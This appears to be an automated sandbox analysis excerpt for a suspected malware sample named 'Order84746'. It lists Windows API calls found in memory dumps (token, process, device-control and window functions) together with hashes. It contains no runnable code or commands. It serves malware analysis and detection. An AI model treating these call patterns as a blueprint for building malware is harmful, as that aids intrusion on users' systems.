                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          • Opcode ID: 9b54adc9f851c0392f98e1d26e56be3cf5e1f1d786b39592762c0f148fc589f8
                          • Instruction ID: 1ab933596ad5b3f514f8fa1798db351936160657f9c87ce04104ea7baf36126f
                          • Opcode Fuzzy Hash: 9b54adc9f851c0392f98e1d26e56be3cf5e1f1d786b39592762c0f148fc589f8
                          • Instruction Fuzzy Hash: 2421B471A00228EFDB20CF91EC88ADABBBCEFC0700F00856DE51692055D7B5EA58EF50
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00926733
                          • _memset.LIBCMT ref: 00926754
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009267A6
                          • CloseHandle.KERNEL32(00000000), ref: 009267AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: 45a1b40d8cfbee0c67f502cf75b857ddc819c6463ec48cfd8e9749603c5f8bdb
                          • Instruction ID: 2f2661362930ba321d548550fed570655be72f4e919958a21344150e4d33a1cf
                          • Opcode Fuzzy Hash: 45a1b40d8cfbee0c67f502cf75b857ddc819c6463ec48cfd8e9749603c5f8bdb
                          • Instruction Fuzzy Hash: 0411A776D012287AE72057A5AC4DFAFBABCEF44764F10419AF514E71D0D2744E848BB4
                          APIs
                            • Part of subcall function 0091AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0091AA79
                            • Part of subcall function 0091AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0091AA83
                            • Part of subcall function 0091AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0091AA92
                            • Part of subcall function 0091AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0091AA99
                            • Part of subcall function 0091AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091AAAF
                          • GetLengthSid.ADVAPI32(?,00000000,0091ADE4,?,?), ref: 0091B21B
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0091B227
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091B22E
                          • CopySid.ADVAPI32(?,00000000,?), ref: 0091B247
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                          • String ID:
                          • API String ID: 259861997-0
                          • Opcode ID: 883602b3617f0a78bc3a462211fb704f3ad0ab0edbdc97fe994bb04d8b2ee7c5
                          • Instruction ID: 6e1a175dba2de270b26753453e8d0a1df6e1bdd3d8b04fbed6e71dfcd7b8f19d
                          • Opcode Fuzzy Hash: 883602b3617f0a78bc3a462211fb704f3ad0ab0edbdc97fe994bb04d8b2ee7c5
                          • Instruction Fuzzy Hash: 9511BF71B01209AFCB049F94DD84AEEB7AEEF95304F14842DE95297210D771AE88DB10
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0091B498
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4AA
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4C0
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: ba189d2a739d2c89a4598577ce066d19a9e43647f737ed8e9832692873cb539c
                          • Instruction ID: 841ceb7d3ab2a39109f34e426d7138830e92f2ad7f4a5e63b96ff034e471cee6
                          • Opcode Fuzzy Hash: ba189d2a739d2c89a4598577ce066d19a9e43647f737ed8e9832692873cb539c
                          • Instruction Fuzzy Hash: 69114C7AA00218FFDB11DF99C981EDDBBB9FB08700F204095E604B7290D771AE50DB94
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00927352
                          • MessageBoxW.USER32(?,?,?,?), ref: 00927385
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0092739B
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009273A2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 54b1e0ed5d997851ed97058027068f2c738bcb60a9e5fe388cd77858b94b91ff
                          • Instruction ID: 6dae75c0d0f0b3a891c4253110204ad9cbf42ab9ba1848d17412182159d03d30
                          • Opcode Fuzzy Hash: 54b1e0ed5d997851ed97058027068f2c738bcb60a9e5fe388cd77858b94b91ff
                          • Instruction Fuzzy Hash: D911E572A1C214AFC701DBA8EC05B9EBBAD9F45310F044219FC31E3291D6B08910A7E0
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                          • GetStockObject.GDI32(00000011), ref: 008FD1CE
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 221a8280c8924061b9f2e45aa7d0924208d89986ec1cc80c5254f1852648d2ff
                          • Instruction ID: ac858ef5e5b259db3e100ca0c1f30c91d4e69875e1c4481bc9698a86246695a2
                          • Opcode Fuzzy Hash: 221a8280c8924061b9f2e45aa7d0924208d89986ec1cc80c5254f1852648d2ff
                          • Instruction Fuzzy Hash: B311A1B250560DBFEF014FA0DC50EFABB6AFF093A4F040116FB1492050C7729DA0ABA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction ID: f929a64cc352847245b7a6b3c2128a9f7a389374ac6ca46a479e19285c7e656b
                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction Fuzzy Hash: 1401483620014EFBCF125E88DC068EE3F27BB5C351B598555FA2899031D336CAB2AB81
                          APIs
                            • Part of subcall function 00907A0D: __getptd_noexit.LIBCMT ref: 00907A0E
                          • __lock.LIBCMT ref: 0090748F
                          • InterlockedDecrement.KERNEL32(?), ref: 009074AC
                          • _free.LIBCMT ref: 009074BF
                          • InterlockedIncrement.KERNEL32(00FE1A30), ref: 009074D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          • Opcode ID: 20453b26a343d39114e2eec9121400ef1c2a4710932f9a25dec523b987dd4d61
                          • Instruction ID: 9795c87c79b3ab6c885c2bbd2f30eaf67451358284bbf624310efdfa9144fb0b
                          • Opcode Fuzzy Hash: 20453b26a343d39114e2eec9121400ef1c2a4710932f9a25dec523b987dd4d61
                          • Instruction Fuzzy Hash: 5F018E32E0A621EFD761AFA9940675DFB65AF84721F154009F414676E0C7247950DFC2
                          APIs
                          • __lock.LIBCMT ref: 00907AD8
                            • Part of subcall function 00907CF4: __mtinitlocknum.LIBCMT ref: 00907D06
                            • Part of subcall function 00907CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00907D1F
                          • InterlockedIncrement.KERNEL32(?), ref: 00907AE5
                          • __lock.LIBCMT ref: 00907AF9
                          • ___addlocaleref.LIBCMT ref: 00907B17
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          • Opcode ID: 1ea32ffed73ce25c0e331e434176e6dd72cf2f9fccdbfeb4d40b1fc3360fa34d
                          • Instruction ID: 825fcedb0cf4fb3183b1572849022b8cf1ce19ebb51e994aae7bb7559065c7ac
                          • Opcode Fuzzy Hash: 1ea32ffed73ce25c0e331e434176e6dd72cf2f9fccdbfeb4d40b1fc3360fa34d
                          • Instruction Fuzzy Hash: E9015B71904B009EE7309FA9C90574AF7F0EF80325F20890EA49A962E0CBB0A680CB51
                          APIs
                          • _memset.LIBCMT ref: 0094E33D
                          • _memset.LIBCMT ref: 0094E34C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A3D00,009A3D44), ref: 0094E37B
                          • CloseHandle.KERNEL32 ref: 0094E38D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 1e2a149f0f33613187629699c6913098e2a0c66629000b01543ed3ba69f71708
                          • Instruction ID: b5670a7c911b381f572c538c1fe91db1f86376865e14424de53e78ff4f001e31
                          • Opcode Fuzzy Hash: 1e2a149f0f33613187629699c6913098e2a0c66629000b01543ed3ba69f71708
                          • Instruction Fuzzy Hash: 46F03AB1A64304BEE3101B61AC46F777E9CDB06B54F008421FE0AD61E2D3759E00A6F8
                          APIs
                            • Part of subcall function 008FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FAFF2
                            • Part of subcall function 008FAF83: BeginPath.GDI32(?), ref: 008FB009
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FB033
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094EA8E
                          • LineTo.GDI32(00000000,?,?), ref: 0094EA9B
                          • EndPath.GDI32(00000000), ref: 0094EAAB
                          • StrokePath.GDI32(00000000), ref: 0094EAB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: e9684ae89eac9de72366e542a8ef2169b541cb8b27b5c4d29902d4f40b9dbd1f
                          • Instruction ID: 77d61d8b8b1f56195195ce904fd25735688c1cfcfd8b2b996509e8b6ed35701e
                          • Opcode Fuzzy Hash: e9684ae89eac9de72366e542a8ef2169b541cb8b27b5c4d29902d4f40b9dbd1f
                          • Instruction Fuzzy Hash: 65F0E23151A258BBDB129FA4AC0DFCE3F19AF0A310F084105FF21A00E187B45511EBD6
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091C84A
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091C85D
                          • GetCurrentThreadId.KERNEL32 ref: 0091C864
                          • AttachThreadInput.USER32(00000000), ref: 0091C86B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 537dfd79bf0c4e2cb9bc3495a23bd630992dcf3e55f8db97d8fda5148b479d24
                          • Instruction ID: 47b5dc6cee65119ddfb0d6a10c203baddc1f77366abeba6582f80a00fd02a0c9
                          • Opcode Fuzzy Hash: 537dfd79bf0c4e2cb9bc3495a23bd630992dcf3e55f8db97d8fda5148b479d24
                          • Instruction Fuzzy Hash: 2CE0657165622876DB105BA1DC4DEDB7F1CEF067A1F008015F51D84460C6F1C580D7E0
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 0091B0D6
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0091AC9D), ref: 0091B0DD
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0091AC9D), ref: 0091B0EA
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0091AC9D), ref: 0091B0F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 8416f860ac9117735e6f423358708641cf6740eaae6678692708ec65457f4237
                          • Instruction ID: fff1dde363c6e5d55e5c16c8cdb0d891259195435a6cbae2c337761b289d567b
                          • Opcode Fuzzy Hash: 8416f860ac9117735e6f423358708641cf6740eaae6678692708ec65457f4237
                          • Instruction Fuzzy Hash: E7E04F32B162129BE7201FB25C0CB873BADAF59795F02881CE261D6040DAA484419760
                          APIs
                          • GetSysColor.USER32(00000008), ref: 008FB496
                          • SetTextColor.GDI32(?,000000FF), ref: 008FB4A0
                          • SetBkMode.GDI32(?,00000001), ref: 008FB4B5
                          • GetStockObject.GDI32(00000005), ref: 008FB4BD
                          • GetWindowDC.USER32(?,00000000), ref: 0095DE2B
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0095DE38
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0095DE51
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0095DE6A
                          • GetPixel.GDI32(00000000,?,?), ref: 0095DE8A
                          • ReleaseDC.USER32(?,00000000), ref: 0095DE95
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 7a8612b8f7ffefba2104eb7a1644dfcbf61c146a22232e2cf3b657f8e72a1930
                          • Instruction ID: 41bb358a8de3208002a6ccc80e3ad9ed579a3d60e2729ece2593423b6a7b5886
                          • Opcode Fuzzy Hash: 7a8612b8f7ffefba2104eb7a1644dfcbf61c146a22232e2cf3b657f8e72a1930
                          • Instruction Fuzzy Hash: 0CE06D31619240AAEF215B75EC0DBD83B11EB1333AF00C22AFA7A980E1C3F18584EB11
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: d1a65e26c32dd47ec1af93d4d13074569e217e3260917af13c678c5a8b1dd0dd
                          • Instruction ID: d75699f153f90ef442a2b02af7ed27c45e8471bb016b47730b3bf93c021ed321
                          • Opcode Fuzzy Hash: d1a65e26c32dd47ec1af93d4d13074569e217e3260917af13c678c5a8b1dd0dd
                          • Instruction Fuzzy Hash: 46E04FB1A14208EFDB005F70CC4862D7BA5FB4C351F11C809FD6AC7250CBB49840AF51
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 1fe30d10c548b6daf82c66a3d10e7185d5bcbc74ad67151e4ca6288024f6ed14
                          • Instruction ID: d7a59b22a2dcae02a6e96399a69f6e90e176fe7198a3c6107a5ec0db5a06c24a
                          • Opcode Fuzzy Hash: 1fe30d10c548b6daf82c66a3d10e7185d5bcbc74ad67151e4ca6288024f6ed14
                          • Instruction Fuzzy Hash: D6E046B1A14208EFDB005F70CC4862D7BA9FB4C390F128809FA6ACB250CBB89800AB50
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 0091DEAA
